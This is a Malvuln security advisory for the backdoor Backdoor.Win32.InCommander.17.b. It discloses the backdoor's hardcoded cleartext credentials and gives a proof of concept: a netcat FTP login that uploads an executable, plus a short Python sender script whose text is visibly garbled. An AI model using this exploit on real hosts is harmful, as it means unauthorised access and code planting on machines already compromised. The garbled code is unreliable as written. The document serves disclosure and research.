Backdoor.Win32.InCommander.17.b MVID-2022-0665 Hardcoded Credentials

Credits: Malvuln (John Page, aka Hyp3rlinx), Discovery (c) 2022
Original source: https://malvuln.com/advisory/dd76d8a5874bf8bf05279e35c68449ca.txt

Contact: [email protected]

Media: twitter.com/malvuln

Backup media: infosec.exchange/@malvuln

Threat: Backdoor.Win32.InCommander.17.b

Vulnerability: Cleartext Credentials in Hardcoded Cleartext

Family: InCommander

Type: PE32

MD5: dd76d8a5874bf8bf05279e35c68449ca

Vuln ID: MVID-2022 – 0665

Files dropped: incsrv.exe

Disclosure: 12/14/2022

Description: This malware listens to TCP ports 9400 and 9401, and needs authentication. The username IncUserb3 is saved in cleartext under Windows dir in the file “incsrv.drv”. The password “InClientMainPassword” is also stored in cleartext but within the PE file “incsrv.exe” at offset 000958d0.

Third-party adversaries can then upload their executables via ftp PASV or STOR commands.

Exploit/PoC:

C:>nc64.exe 192.168.18.125 9401

Ready to use 220 InCommad FTP Server

USER IncUser – b3

For IncUser-b3., you will need a 331 password

PASS InClientMainPassword

Log in as 230 User IncUserb3.

SYST

215 UNIX Type: L8 Internet Component Suite

PASV

227 Entering Passive Mode (192,168,18,125,241,155).

CDUP

Successful 250 CWD Command Current directory is “C:/”.

STOR DOOM_SM.exe

150 Open data connection to DOOM_SM.exe

226 File received OK

From socket import

MALWARE_HOST=”192.168.18.125″

PORT=61851

DOOM=”DOOM_SM.exe”

def doit():

s=socket(AF_INET, SOCK_STREAM)

s.connect((MALWARE_HOST, PORT))

f = open (DOOM, “rb”)

EXE = F.read()

s.send(EXE)

While EXE is:

s.send(EXE)

EXE=f.read()

s.close()

print(“By Malvuln”);

if __name__==”__main__”:

doit()

Disclaimer: This advisory information is provided “as-is,” without warranties, guarantees or other conditions. This advisory may be redistributed, subject to its original form and credit. For inclusion in vulnerability databases or similar programs, permission is granted explicitly provided credit to the author. Author is not responsible or liable for misuse or misappropriation of information. Any malicious or illegal use of security-related information, exploits or other methods is prohibited by the author. You should not try to obtain Malware samples. This website does not accept responsibility for damages resulting from Malware handling errors or downloading any Malware. Copyright for all content (c) Malvuln.comTM